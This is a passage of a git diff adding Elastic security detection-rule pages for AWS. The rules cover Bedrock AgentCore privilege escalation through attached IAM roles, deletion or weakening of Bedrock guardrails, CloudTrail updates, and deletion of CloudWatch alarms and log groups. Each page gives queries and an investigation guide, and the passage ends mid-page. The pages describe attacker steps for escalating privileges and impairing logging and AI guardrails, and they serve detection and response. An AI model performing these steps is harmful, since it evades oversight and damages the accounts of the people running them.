docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privacy-control-bypass-via-tccdb-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privilege-escalation-via-suid-sgid.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privilege-escalation-via-unshare-and-uid-change.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-timestomp-in-executable-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-process-execution-followed-by-self-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rare-connection-to-webdav-target.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-remote-ssh-login-enabled-via-systemsetup-command.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rpc-remote-procedure-call-from-the-internet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rpc-remote-procedure-call-to-the-internet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-sensitive-files-compression.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-from-the-internet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-to-the-internet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-smtp-to-the-internet-on-port-26-tcp.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-ssfilecopysender-executed-as-root.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-child-process-of-papercut-server-component.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-java-class-file-created-in-papercut-server-library.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-proc-maps-discovery.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-process-execution-by-zoom.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-reading-of-procfs-syscall-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-web-browser-sensitive-file-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-unusual-file-creation-via-web-server.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-vnc-virtual-network-computing-from-the-internet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-vnc-virtual-network-computing-to-the-internet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-web-server-potential-sql-injection-request.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-detective-graph-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-guardduty-publishing-destination-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-guardduty-threat-intelligence-set-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-ses-email-identity-verified-then-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/binfmt-configuration-file-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/claude-cowork-vm-boot-image-tamper.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/newly-observed-ipsec-nat-traversal-peer.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-dns-rebinding-from-public-to-private-address.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-evasion-via-boot-time-removal-tool.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-iis-web-shell-file-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-java-service-exploitation-via-suspicious-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/process-execution-followed-by-self-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/ssfilecopysender-executed-as-root.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-child-process-of-papercut-server-component.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-java-class-file-created-in-papercut-server-library.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-by-zoom.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-reading-of-procfs-syscall-file.asciidoc diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc new file mode 100644 index 0000000000..879106b62c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-32-aws-bedrock-agentcore-resource-created-with-iam-execution-role]] +=== AWS Bedrock AgentCore Resource Created with IAM Execution Role + +Detects the creation of an AWS Bedrock AgentCore resource (code interpreter, agent runtime, browser, or harness) with an IAM execution role attached. When an attacker with iam:PassRole permission creates an AgentCore resource and attaches a privileged role, subsequent invocations inside that resource execute as the attached role — enabling privilege escalation to roles that trust bedrock-agentcore.amazonaws.com. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.beyondtrust.com/blog/entry/aws-agentcore-privilege-escalation + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Bedrock +* Service: AWS IAM +* Tactic: Privilege Escalation +* Tactic: Persistence +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Bedrock AgentCore Resource Created with IAM Execution Role* + + +AWS Bedrock AgentCore services (code interpreters, agent runtimes, browsers, harnesses) run user workloads inside isolated MicroVMs. When an IAM role is attached at creation time, all code executing inside the resource assumes that role's identity. An attacker with iam:PassRole and bedrock-agentcore:Create* permissions can attach a privileged role and then invoke the resource to operate as that role. + +The four Create* events covered here are management-plane events logged to CloudTrail by default. The subsequent Start*/Invoke* data-plane events are NOT captured by the default management events trail and cannot be detected without enabling data-plane logging. + + +*Possible investigation steps* + + +- Check the caller identity (`aws.cloudtrail.user_identity.arn`) against expected provisioning principals. Unexpected users or roles creating AgentCore resources should be investigated. +- Examine `aws.cloudtrail.request_parameters` for the attached role ARN (`executionRoleArn` or `roleArn`) and evaluate whether that role has permissions beyond what the AgentCore workload legitimately requires. +- Check for subsequent `StartCodeInterpreterSession`, `StartBrowserSession`, or `InvokeAgentRuntime` events from the same caller against the newly created resource (requires data-plane logging to be enabled). +- Review the IAM PassRole permission of the calling identity and whether it is constrained by `iam:PassedToService` conditions. + + +*False positive analysis* + + +- Automated provisioning by CDK/CloudFormation/Terraform with a known service account. +- Platform engineering pipelines deploying Bedrock-based AI workloads. +- Filter on `user_agent.original` for known IaC tools. + + +*Response and remediation* + + +- Suspend the calling identity's iam:PassRole permission while investigating. +- Delete the newly created AgentCore resource to stop active sessions. +- Rotate the attached execution role's credentials if exploitation is confirmed. +- Enable data-plane logging for bedrock-agentcore to detect subsequent session invocations. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "aws.cloudtrail" and + event.provider: "bedrock-agentcore.amazonaws.com" and + event.action: ( + "CreateCodeInterpreter" or + "CreateAgentRuntime" or + "CreateBrowser" or + "CreateHarness" + ) and + event.outcome: "success" and + aws.cloudtrail.request_parameters: (*executionRoleArn* or *roleArn*) and + not aws.cloudtrail.user_identity.invoked_by: ("bedrock-agentcore.amazonaws.com" or "cloudformation.amazonaws.com") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-bedrock-guardrail-deleted-or-weakened.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-bedrock-guardrail-deleted-or-weakened.asciidoc new file mode 100644 index 0000000000..e5393b8254 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-bedrock-guardrail-deleted-or-weakened.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-32-aws-bedrock-guardrail-deleted-or-weakened]] +=== AWS Bedrock Guardrail Deleted or Weakened + +Detects deletion, weakening, or version management of AWS Bedrock guardrails via the DeleteGuardrail, UpdateGuardrail, DeleteEnforcedGuardrailConfiguration, or PutEnforcedGuardrailConfiguration APIs. Bedrock guardrails enforce content, topic, word, and sensitive-information policies on model invocations. Deleting a guardrail, loosening its policies, removing or overwriting the organization-enforced guardrail configuration, or creating a new version to enforce a weakened configuration allows an adversary to bypass these protections — the cloud control-plane equivalent of disabling a security tool. This activity should be validated against approved change management and the responsible identity. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/bedrock/latest/APIReference/API_DeleteGuardrail.html +* https://docs.aws.amazon.com/bedrock/latest/APIReference/API_UpdateGuardrail.html +* https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails.html + +*Tags*: + +* Domain: Cloud +* Domain: GenAI +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Bedrock +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Bedrock Guardrail Deleted or Weakened* + + +AWS Bedrock guardrails enforce content, topic, word, and sensitive-information policies on model +invocations. Adversaries who gain access to the Bedrock control plane may delete a guardrail (`DeleteGuardrail`), +loosen its policies (`UpdateGuardrail`), remove or overwrite the organization-enforced guardrail +configuration (`DeleteEnforcedGuardrailConfiguration` / `PutEnforcedGuardrailConfiguration`) to then enforce it on +model deployments. This detection identifies those control-plane changes so responders can confirm +intent before accepting the change. + + +*Possible investigation steps* + + +- **Identify the actor and context** + - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, + `aws.cloudtrail.user_identity.access_key_id`, `source.ip`, and `user_agent.original`. + - Confirm a related change request exists and that the identity is authorized to manage guardrails. +- **Validate the change** + - For `UpdateGuardrail` / `PutEnforcedGuardrailConfiguration`, inspect + `aws.cloudtrail.flattened.request_parameters` and `aws.cloudtrail.response_elements` to determine + which content, topic, word, or sensitive-information policies were removed or weakened. + - For `DeleteGuardrail` / `DeleteEnforcedGuardrailConfiguration`, identify the targeted guardrail + or org configuration and whether protected workloads still reference it. +- **Correlate activity** + - Look for surrounding Bedrock `InvokeModel` / `Converse` activity and other defense-impairing + actions (e.g., logging or detector changes) from the same identity. + - Check for prior enumeration such as `ListGuardrails` or `GetGuardrail`. + + +*Response and remediation* + + +- If unauthorized, restore the guardrail and/or org-enforced configuration to its approved state and + re-associate it with affected Bedrock workloads. +- Disable the access key in `aws.cloudtrail.user_identity.access_key_id` and review the actor's + recent activity; rotate credentials if compromise is suspected. +- Restrict `bedrock:DeleteGuardrail`, `bedrock:UpdateGuardrail`, and the enforced-configuration + permissions to a small set of admin roles, and enforce guardrail state via AWS Config or SCPs. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "bedrock.amazonaws.com" + and event.action: ( + "DeleteGuardrail" or + "UpdateGuardrail" or + "DeleteEnforcedGuardrailConfiguration" or + "PutEnforcedGuardrailConfiguration" + ) and event.outcome: "success" + and not user_agent.original: (*Terraform*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudtrail-log-updated.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudtrail-log-updated.asciidoc new file mode 100644 index 0000000000..bc576f2a23 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudtrail-log-updated.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-32-aws-cloudtrail-log-updated]] +=== AWS CloudTrail Log Updated + +Detects updates to an existing CloudTrail trail via UpdateTrail API which may reduce visibility, change destinations, or weaken integrity (e.g., removing global events, moving the S3 destination, or disabling validation). Adversaries can modify trails to evade detection while maintaining a semblance of logging. Validate any configuration change against approved baselines. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_UpdateTrail.html +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 217 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS CloudTrail Log Updated* + + +AWS CloudTrail is a service that enables governance, compliance, and operational and risk auditing of your AWS account. It logs API calls and related events, providing visibility into user activity. Trail modifications can be used by attackers to redirect logs to non-approved buckets, drop regions, or disable valuable selectors. This rule identifies a modification on CloudTrail settings using the `UpdateTrail` API. + + +*Possible investigation steps* + +- **Actor and context** + - Check `aws.cloudtrail.user_identity.arn`, `user_agent.original`, `source.ip`; verify approved change. +- **Assess the modification** + - In `aws.cloudtrail.request_parameters`, note changes to: + - `S3BucketName`, `CloudWatchLogsLogGroupArn`, `KmsKeyId` + - `IsMultiRegionTrail`, `IncludeGlobalServiceEvents` + - Event or insight selectors (management vs data events) +- **Correlate** + - Look for preceding `StopLogging` or following `DeleteTrail`. + - Review concurrent IAM policy edits or role changes by the same actor. + + +*False positive analysis* + +- **Planned changes**: Baseline drift during region onboarding or encryption rotation. +- **Automation**: IaC pipelines updating trails as templates evolve. + + +*Response and remediation* + +- **If unauthorized** + - Revert to baseline; validate destination ownership and KMS policy. + - Investigate time ranges where visibility may have been reduced. +- **Hardening** + - Constrain `cloudtrail:UpdateTrail`, require approvals, and monitor with AWS Config rules. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "cloudtrail.amazonaws.com" + and event.action: "UpdateTrail" + and event.outcome: "success" + and not user_agent.original: (*Pulumi* or *Terraform*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Manipulation +** ID: T1565 +** Reference URL: https://attack.mitre.org/techniques/T1565/ +* Sub-technique: +** Name: Stored Data Manipulation +** ID: T1565.001 +** Reference URL: https://attack.mitre.org/techniques/T1565/001/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-alarm-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-alarm-deletion.asciidoc new file mode 100644 index 0000000000..940d2759d0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-alarm-deletion.asciidoc @@ -0,0 +1,168 @@ +[[prebuilt-rule-8-19-32-aws-cloudwatch-alarm-deletion]] +=== AWS CloudWatch Alarm Deletion + +Detects the deletion of one or more Amazon CloudWatch alarms using the "DeleteAlarms" API. CloudWatch alarms are critical for monitoring metrics and triggering alerts when thresholds are exceeded. An adversary may delete alarms to impair visibility, silence alerts, and evade detection following malicious activity. This behavior may occur during post-exploitation or cleanup phases to remove traces of compromise or disable automated responses. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudwatch/delete-alarms.html +* https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DeleteAlarms.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS CloudWatch +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS CloudWatch Alarm Deletion* + + +Amazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of logs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly. + +Amazon CloudWatch Alarms monitor key metrics and trigger automated alerts or remediation workflows. Deleting these alarms disables monitoring of associated metrics and can delay detection of performance degradation or security incidents. Attackers may delete alarms to evade detection, suppress alerts, or disable security automation that responds to anomalies or policy violations. + +This rule detects successful calls to the `DeleteAlarms` API via CloudTrail. These events should be rare and always associated with a valid change-control request or automation pipeline. + + +*Possible investigation steps* + + +- **Identify the actor** + - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine who initiated the deletion. + - Check whether this actor typically performs CloudWatch management or automation tasks. + +- **Review request details** + - Inspect `aws.cloudtrail.request_parameters` for the specific alarm names deleted. + - Determine whether the alarms were security-related (e.g., CloudTrail log delivery, GuardDuty finding rate, or IAM API monitoring alarms). + - Cross-reference deleted alarms with your organization's list of critical monitoring configurations. + +- **Analyze source and context** + - Review `source.ip` and `user_agent.original` for anomalies such as external IPs, unusual user agents, or custom SDKs. + - Determine whether the activity occurred during a known maintenance window or from a trusted automation host. + - Examine `cloud.region` to identify whether alarms were deleted from unexpected regions. + +- **Correlate with surrounding events** + - Review CloudTrail events for related activity around the same time, such as: + - `PutMetricAlarm`, `DisableAlarmActions`, or `DeleteLogGroup` + - Changes to CloudTrail, Config, or GuardDuty configurations + - IAM policy or permission modifications that could facilitate evasion + - Identify whether the same actor has previously modified logging or monitoring infrastructure. + +- **Assess impact and scope** + - Determine which systems or detection workflows relied on the deleted alarms. + - Review whether the deletion affected automated responses, notifications, or third-party integrations (e.g., SNS, Lambda, or PagerDuty). + + +*False positive analysis* + + +- **Legitimate automation or redeployment** + - Infrastructure as Code (IaC) frameworks such as Terraform or CloudFormation may delete and recreate alarms during updates. + - Validate automation account roles and ensure alarm deletions are immediately followed by re-creation actions. +- **Operational maintenance** + - Scheduled monitoring cleanup, regional deactivation, or test environment resets can trigger legitimate deletions. + - Verify timing and user identity against approved change management records. +- **Organizational migrations** + - Security operations or DevOps teams may consolidate alarms during account merges or refactors. + - Confirm intent with relevant teams and exclude authorized administrative accounts as necessary. + + +*Response and remediation* + + +- **Containment** + - If the deletion was unauthorized, recreate the deleted alarms immediately using IaC templates or CloudFormation backups. + - Re-enable any dependent automation or alerts that rely on those alarms. + - Temporarily restrict CloudWatch modification privileges to designated IAM roles. + +- **Investigation** + - Review related CloudTrail logs for preceding IAM changes, STS activity, or anomalous role assumptions that might indicate compromised credentials. + - Investigate whether any alerts were suppressed or delayed prior to the deletion. + +- **Recovery and hardening** + - Implement AWS Config rules to continuously monitor alarm existence and alert on `DeleteAlarms` API calls. + - Restrict permissions to `cloudwatch:DeleteAlarms` and enforce MFA for users performing monitoring configuration changes. + - Maintain IaC definitions for all critical alarms to support rapid restoration. + - Audit IAM roles and automation accounts that manage CloudWatch configurations to ensure least privilege. + - Integrate alarm configuration checks into your CI/CD validation workflows. + + +*Additional information* + + +- **https://docs.aws.amazon.com/config/latest/developerguide/cloudwatch-alarm-action-check.html[AWS Config Rule – cloudwatch-alarm-action-check]** +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "monitoring.amazonaws.com" + and event.action: "DeleteAlarms" + and event.outcome: "success" + and source.ip: * + and not user_agent.original : ("AWS Internal" or "dynamodb.application-autoscaling.amazonaws.com" or "application-autoscaling.amazonaws.com" or *Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Indicator Blocking +** ID: T1562.006 +** Reference URL: https://attack.mitre.org/techniques/T1562/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-log-group-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-log-group-deletion.asciidoc new file mode 100644 index 0000000000..b14e18a665 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-log-group-deletion.asciidoc @@ -0,0 +1,195 @@ +[[prebuilt-rule-8-19-32-aws-cloudwatch-log-group-deletion]] +=== AWS CloudWatch Log Group Deletion + +Detects the deletion of an Amazon CloudWatch Log Group using the "DeleteLogGroup" API. CloudWatch log groups store operational and security logs for AWS services and custom applications. Deleting a log group permanently removes all associated log streams and historical log data, which can eliminate forensic evidence and disrupt security monitoring pipelines. Adversaries may delete log groups to conceal malicious activity, disable log forwarding, or impede incident response. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/delete-log-group.html +* https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteLogGroup.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS CloudWatch +* Tactic: Defense Evasion +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 216 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS CloudWatch Log Group Deletion* + + +CloudWatch Logs is foundational to AWS observability, SIEM ingestion, audit pipelines, and incident response. +Log groups often contain retention-critical logs such as: + +- VPC Flow Logs +- Lambda function logs +- Application and container logs +- Security service logs (e.g., AWS WAF, RDS logs) + +Deletion of a log group removes all historical log streams and cannot be reversed. +Adversaries may leverage `DeleteLogGroup` to impair forensic visibility, disrupt monitoring, and hide evidence following malicious actions. This rule detects a successful `DeleteLogGroup` event initiated from a non–AWS Internal user agent, signalling potential defense evasion or disruption of logging pipelines. + + +*Possible investigation steps* + + + **Identify the actor** +- Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id`. +- Determine whether this identity normally modifies CloudWatch Logs or is associated with automation. + +**Review deletion details** +- Inspect `aws.cloudtrail.request_parameters` to determine the exact log group deleted. +- Assess whether the log group provided visibility into: + - CloudTrail processing, + - Network flows (VPC Flow Logs), + - Serverless/application security logs, + - Lambda, ECS, EKS, or container workload logs. + +**Check source and context** +- Assess `source.ip` for unusual IPs, geolocations, VPN endpoints, or cloud provider 